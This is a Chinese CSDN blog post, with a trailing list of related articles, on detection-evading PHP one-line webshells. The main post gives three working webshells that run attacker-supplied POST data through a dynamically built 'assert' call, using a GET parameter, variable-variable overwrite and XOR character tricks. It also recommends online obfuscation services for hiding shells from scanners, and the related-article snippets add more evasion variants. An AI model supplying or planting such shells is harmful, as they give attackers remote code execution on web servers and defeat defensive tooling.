免杀-一句话的免杀

最新推荐文章于 2024-08-22 20:44:44 发布
最新推荐文章于 2024-08-22 20:44:44 发布
阅读量524 收藏 8
点赞数 9
分类专栏: 免杀 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134968653
版权

WAF绕过-权限控制篇-后门免杀

根据这个师傅的文章来学习

1.传参带入

<?php

$a = $_GET['a'];

$aa = $a . 'ert';

$aa(base64_decode($_POST['x']));
?>

经过测试在 php5的版本能够实现getshell

并且eval无法实现

2.变量覆盖

<?php

$a = 'b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>

可以通过变量覆盖的方式实现getshell

3.异或运算

<?php

$a=('!'^'@').'ssert';

$a($_POST['x']);

?>

这里我们可以 !^@ = a

4.混淆/加密变异

这里提供网站

Free Online Developer Tools - TOOLFK

PHP加密 - PHP在线加密平台

php加密|php在线加密|php组件加密|php源码加密|zend加密|ionCube9加密|最好的PHP在线加密工具​​​​​​

将代码存入上面加密后可以发现无法 检测出webshell

双层小牛堡
关注
专栏目录
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2498
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
一句话木马以及免杀
抚琴
01-08 3960
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
PHP免殺一句話
01-20
免殺一句話 使用ascii算法 range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a [113]).chr($a[115]);
免杀一句话
cc1988429的专栏
04-18 2461
0x01:ASP一句话 1. 2. 3. 0x02:免杀大部分网站的一句话 4. 0x03:免杀部分网站过略的一句话 5.executerequest("x") 0x04:免杀部分网站过略双引号的一句话 6. 0x05:php一句话 7. 0x06:aspx一句话 8. WebAdmin2Y.x.y aaaaa = newWebAdmin2Y.x.y("x");
PHP一句话木马免杀方式汇总
最新发布
qq_48368964的博客
08-22 1014
create_function函数把用户传递的数据生成一个函数fun(),然后再执行fun()php$fun();?
php一句话木马免杀
qq_58683895的博客
11-21 2130
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
php一句话免杀
收集盒 Book box
09-13 1069
by Tm3yShell7 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost
PHP一句话 免杀
10-23
PHP一句话 免杀
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
php一句话免杀尝试
Blazing-Angel的博客
02-24 646
<?php error_reporting(0); $a = rad2deg^(3).(2); $b = asin^(2).(6); $c = ceil^(1).(1); $exp = $a.$b.$c; //assert $pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET $pi=$$pi; //$_GET call_user_func($exp,$pi{0}($pi{1})); ?> 利用数学函数进行异或构造,从中寻找可用函数,没找到eval,找到了ass
PHP一句话木马免杀
墨痕诉清风的博客
10-07 5974
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句话木马免杀(通过VirusTotal测试)
m0_52233414的博客
01-28 3506
通过拼接,编码,加密等方法对PHP一句话木马进行免杀处理
PHP一句话 免杀思路 分析
HoAd'blog
07-28 392
php免杀以及一个免杀的小马分享没什么技术含量,但是主要是学思路小马免杀思路最后后 没什么技术含量,但是主要是学思路 推荐新手观看 小马 通过base64编码,然后拆分了函数关键字,通过变量的引用等,然后@不报错,eval不能拆分使用 <?php $b=sert; $c=base64_encode($b); $d='as'.base64_decode($c); @$d($_POST['1']); ?> 很简单,然后还有下面是升级版免杀思路 免杀思路 异或函数的一个字母 用双重加密来绕过 弱类
关于php一句话免杀的分析
fengling132的专栏
05-24 712
一开始想这样:     客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert   可以都用post:       在菜刀说明用ts7=assertpost附加数据.   这中间考虑了这些:     猛然发现assert这个关键词又出现了。。 既然字符串可以直接这样
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5319
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
科迅免杀php一句话_php免杀一句话[2016最新过狗过盾等一切防火墙一句话]
weixin_31016735的博客
12-30 282
php免杀一句话[2016最新过狗过盾等一切防火墙一句话]常用一句话木马asp一句话木马:php一句话木马:aspx一句话木马:其他一句话木马:"" Then Execute(Request("value"))%>""then session("value")=request("value"):end if:if session("value")<>"" then execute...
科迅免杀php一句话_那些强悍的PHP一句话后门
weixin_39526872的博客
12-21 313
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的 PHP一句话 后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值